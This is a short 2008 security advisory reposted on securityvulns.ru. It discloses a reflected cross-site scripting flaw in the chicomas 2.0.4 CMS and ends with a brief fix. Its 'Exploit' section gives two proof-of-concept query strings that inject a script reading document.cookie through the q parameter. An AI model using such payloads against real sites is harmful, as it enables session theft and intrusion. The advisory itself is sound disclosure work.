Security Advisory: chicomas.2.0.4 - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Zomplog 3.8.2 XSS Vulnerability
  project alumni v1.0.9 (info.php) SQL Injection Vulnerability
  Lifetype 1.2.7 XSS Vulnerability
  BlackBook v1.0 Multiple XSS Vulnerabilities

From: hadihadi_zedehal_2006_(at)_yahoo.com <hadihadi_zedehal_2006_(at)_yahoo.com>
Date: 02.05.2008
Subject: chicomas.2.0.4

Author : Hadi Kiamarsi
---------------------------------------------------------------------------------
-
Discovered by : Hadi Kiamarsi
---------------------------------------------------------------------------------
-
Exploited By : Hadi Kiamarsi
---------------------------------------------------------------------------------
-
E-Mail : hadikiamarsi[at]hotmail.com
---------------------------------------------------------------------------------
-
WebSite : http://ircrash.com
---------------------------------------------------------------------------------
-
Our Team : ircrash
---------------------------------------------------------------------------------
-
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
---------------------------------------------------------------------------------
-

CMS: chicomas.2.0.4
Download CMS : http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip

---------------------------------------------------------------------------------
-

Exploit :

Method = POST

query : http://www.example.com/[chicomas]/index.
php?q=>"><script>alert(document.cookie)</script>
query : http://www.example.com/[chicomas]/index.
php?q="><script>alert(document.cookie)</script>

---------------------------------------------------------------------------------
--

Solution :

you must filter special character in input via htmlspecialchar() function

---------------------------------------------------------------------------------
--